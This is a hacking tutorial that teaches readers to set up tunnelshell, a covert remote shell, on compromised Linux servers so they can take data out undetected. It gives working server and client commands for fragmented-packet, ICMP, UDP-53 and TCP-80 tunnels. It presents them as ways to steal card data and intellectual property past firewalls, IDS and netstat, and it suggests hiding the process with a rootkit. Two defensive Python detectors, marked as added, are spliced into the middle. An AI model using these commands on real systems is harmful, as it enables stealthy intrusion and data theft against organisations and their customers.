Hack Like a Pro: How to Create a Nearly Undetectable Covert Channel with Tunnelshell
Welcome back, my rookie hackers!
Most often, the professional hacker is seeking protected information from the target system or network. This might be credit card numbers, personally identifiable information, or intellectual property (formulas, plans, blueprints, designs, etc.). Most of my Null Byte guides have been focused on getting into the system, but this only begs the question—"what do I do when I get there?"
If a hacker is pursuing information or data, they need a way to get the data out of the target system or network. Optimally, they want to get the data out in a way that won't be detected by the security devices or the security admins. In this tutorial, we will look at creating a covert channel that we can use to extract the data with little chance of being detected using a tool called tunnelshell.
Tunnelshell is a sweet, little program that only works on compromised Linux/Unix servers. As many large corporate and institutional servers are running some flavor from the Unix family (AIX, HP-UX, Solaris, IRIX, Linux, etc.), there should not be a significant impediment to using tunnelshell for exfiltrating (removing) data.
Of course, it won't work on extracting data from your ex-wife's or girlfriend's computer, not even a small-to-medium sized company using one of the many versions of Windows Server (2003, 2008, 2012), but it will work on the big boy servers, which is where all the valuable goodies are.
It operates in the familiar client/server architecture like most Linux/Unix applications. The beauty of tunnelshell is that it will work over multiple protocols, including TCP, UDP, ICMP, and RawIP. In addition, it is able to fragment packets to get past firewalls and intrusion detection systems.
In TCP and UDP modes, it does not require binding to a socket or port, so when the victim runs netstat, no open port will appear (but it will appear in the process list). In TCP mode, no three-way handshake (SYN, SYN-ACK, ACK) is executed, so no IP address will be logged.
In ICMP mode, tunnelshell uses the ICMP Echo Request/Echo Reply (Type 8 and Type 0) to transport the data. Therefore, it appears to be a continuous ping running between the systems. Although many routers and firewalls block ICMP coming IN, they usually do not block ICMP going OUT as users and admins need to use ping to find active hosts.
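From the monitoring side, the ICMP mode described above is checkable because a genuine echo reply must return the request's identifier, sequence number and data unchanged (RFC 792). The following is an added example, not part of the original article or of tunnelshell: a generic detector that flags replies breaking that rule, run over a constructed capture with made-up addresses and payloads.

```python
import struct
from collections import namedtuple

Echo = namedtuple("Echo", "src dst type ident seq payload")

def parse_echo(src, dst, icmp_bytes):
    """Return an Echo for ICMP type 8 (request) or 0 (reply), else None."""
    if len(icmp_bytes) < 8:
        return None
    mtype, code, _csum, ident, seq = struct.unpack("!BBHHH", icmp_bytes[:8])
    if mtype not in (0, 8) or code != 0:
        return None
    return Echo(src, dst, mtype, ident, seq, icmp_bytes[8:])

def find_echo_anomalies(packets):
    """Flag echo replies with no pending request or with altered data."""
    pending = {}    # (requester, responder, id, seq) -> request payload
    findings = []
    for src, dst, raw in packets:
        e = parse_echo(src, dst, raw)
        if e is None:
            continue
        if e.type == 8:
            pending[(e.src, e.dst, e.ident, e.seq)] = e.payload
            continue
        key = (e.dst, e.src, e.ident, e.seq)    # a reply travels the other way
        if key not in pending:
            findings.append(("unsolicited-reply", e.src, e.dst, e.seq))
        elif pending.pop(key) != e.payload:
            findings.append(("payload-mismatch", e.src, e.dst, e.seq))
    return findings

def icmp(mtype, ident, seq, payload):
    """Build a constructed ICMP echo message (checksum left at zero)."""
    return struct.pack("!BBHHH", mtype, 0, 0, ident, seq) + payload

# Constructed capture: one normal ping exchange, then two suspicious replies.
SAMPLE = [
    ("10.0.0.5", "10.0.0.9", icmp(8, 0x1234, 1, b"abcdefgh" * 7)),
    ("10.0.0.9", "10.0.0.5", icmp(0, 0x1234, 1, b"abcdefgh" * 7)),
    ("10.0.0.5", "10.0.0.9", icmp(8, 0x1234, 2, b"abcdefgh" * 7)),
    ("10.0.0.9", "10.0.0.5", icmp(0, 0x1234, 2, b"constructed command output\n")),
    ("10.0.0.9", "10.0.0.5", icmp(0, 0x4321, 7, b"more constructed output\n")),
]

if __name__ == "__main__":
    for finding in find_echo_anomalies(SAMPLE):
        print(finding)
```

In production the same comparison would run over packets taken from a sensor or capture file, with the pending table aged out so lost replies do not accumulate.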
Unfortunately, Kali does not include tunnelshell. I think you can understand that the developers of Kali could not include all of the hacking and security tools out there. In this tutorial, I will be creating a tunnel between our Kali system and a compromised Linux system. In this case, I will use BackTrack 5v3 (which is built on Ubuntu) as my victim, but any of the UNIX/Linux flavors will work as an adequate victim.
Fire up Kali and let's download tunnelshell. Normally, we could use apt-get or Kali's graphical Add/Remove Software utility, but since tunnelshell is not in Kali's repository, that's not an option. There are numerous ways we could download it, but let's use the old-fashioned way of simply going to the website and downloading it.
Navigate to Packet Storm Security to download tunnelshell. Notice that it is a .tgz file, which means that it is a compressed .tar file. This means that we will need to untar it and uncompress it before we can use it.
In the screenshot below, I have downloaded it to BackTrack. Obviously, if this was the victim system, this would not be the easiest or most stealthy way to get tunnelshell on that system. In reality, I could TFTP it from my attacking system to the victim, or if I have Metasploit's Meterpreter on the victim, I have the built-in upload command there.
In the screenshot below, you can see that I have successfully downloaded tunnelshell to the victim.
I need to also download it to my Kali system. I have highlighted the tunnelshell file in my root user directory. It doesn't matter what directory you put it in, just remember where you put it and run the commands from that directory.
To unpack tunnelshell, type:
kali > tar xvfz tunnelshell_2.3.tgz
To compile our new tool, simply type:
kali > make
Now that we have downloaded and compiled tunnelshell on the victim system, the only thing we need to do is type:
kali > ./tunneld
This opens up the server on the victim system waiting for our connection from the client (the attacker). Since we did not use any switches in activating tunnelshell, it runs in the default configuration using packet fragmentation.
The beauty of this default configuration is that it sends fragmented packets (packets broken up into pieces that are reassembled at the destination, a tried and true method of evading detection) that can pass nearly every firewall and IDS without detection.
Now, we only need to connect to the tunnelshell daemon (a background service) on the victim. The syntax is simple; we type:
kali > ./tunnel -t frag 192.168.89.191
- -t - this switch precedes the type of tunnel
- frag - defines the type
- 192.168.89.191 - the IP address of the victim where the tunnelshell server is running
When we do this, tunnelshell connects, but instead of a command prompt it gives us a blank line. We can then type any Linux command and it returns output as if we were at a Linux prompt.
So, below, I typed pwd (present working directory) and it returned the directory that the tunnel is running from on the victim, /tmp. When I type ls -l, it provides a long listing of the /tmp directory. I can then go ahead and type any Linux command from this shell.
Now that we have established a tunnel between the victim and the attacker, let's check to see whether the victim can detect our tunnel. Let's go to the victim system (in this case BackTrack on Ubuntu) and see whether, as a sysadmin, we can detect the tunnel.
First, let's try netstat, which should show us all current connections to our computer. When we type netstat on the victim, you can see many connections, but not our tunnelshell.
The one weakness of tunnelshell is that unless we can embed it in a rootkit that will hide its process, such as Knark, it does appear on our process list as shown below.
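For the sysadmin in this scenario, netstat's port view is the wrong place to look. The following added example (not from the original article) audits raw sockets instead, on the assumption that a listener receiving traffic without a bound port does so through a raw socket, which Linux lists in /proc/net/raw. The sample table, inode numbers, PIDs and the allowlist are constructed.

```python
import os
import re

# Constructed sample in /proc/net/raw format; the "port" column is the IP protocol.
SAMPLE_RAW = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode ref pointer drops
   1: 00000000:0001 00000000:0000 07 00000000:00000000 00:00000000 00000000     0        0 41001 2 0000000000000000 0
   6: 00000000:0006 00000000:0000 07 00000000:00000000 00:00000000 00000000     0        0 41777 2 0000000000000000 0
"""
SAMPLE_OWNERS = {41001: (812, "ping"), 41777: (2290, "tunneld")}  # constructed

def parse_proc_net_raw(text):
    """Return [(ip_protocol, inode)] for every raw socket listed."""
    socks = []
    for line in text.splitlines()[1:]:            # skip the header row
        f = line.split()
        if len(f) >= 10:
            socks.append((int(f[1].split(":")[1], 16), int(f[9])))
    return socks

def socket_owners(proc="/proc"):
    """Map socket inode -> (pid, comm) by reading /proc/<pid>/fd links."""
    owners = {}
    for pid in filter(str.isdigit, os.listdir(proc)):
        try:
            with open(f"{proc}/{pid}/comm") as fh:
                comm = fh.read().strip()
            for fd in os.listdir(f"{proc}/{pid}/fd"):
                m = re.fullmatch(r"socket:\[(\d+)\]",
                                 os.readlink(f"{proc}/{pid}/fd/{fd}"))
                if m:
                    owners[int(m.group(1))] = (int(pid), comm)
        except OSError:
            continue                               # exited, or not readable
    return owners

def audit(raw_text, owners, allowed=("ping",)):
    """List raw sockets whose owner is unknown or not on the allowlist."""
    findings = []
    for proto, inode in parse_proc_net_raw(raw_text):
        pid, comm = owners.get(inode, (None, "<hidden or unreadable>"))
        if comm not in allowed:
            findings.append((proto, inode, pid, comm))
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE_RAW, SAMPLE_OWNERS):
        print(finding)
```

On a live host, run as root with `audit(open("/proc/net/raw").read(), socket_owners())`. A raw socket whose inode maps to no visible process is itself a finding, since that is what a process-hiding rootkit would leave behind.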
Here we used tunnelshell in its default configuration using packet fragmentation, but tunnelshell is also able to use ICMP, TCP, UDP and RawIP, all of which might be more useful depending upon the circumstances.
To run tunnelshell in ICMP mode, you can start the server with:
./tunneld -t icmp -m echo-reply
And the client with:
./tunnel -t icmp -m echo-reply, echo <IPaddressofvictim>
To run tunnelshell in UDP mode on port 53 (the DNS port), you can start the server with:
./tunneld -t udp -p 53, 2000
And the client with:
./tunnel -t udp -p 53, 2000 <IPaddressofvictim>
To start tunnelshell in TCP mode over port 80, you can start the server with:
./tunneld -t tcp -p 80, 2000
And the client with:
./tunnel -t tcp -p 80, 2000 <IPaddressofvictim>
Keep coming back, my rookie hackers, as we explore more techniques and tools of the hacker universe!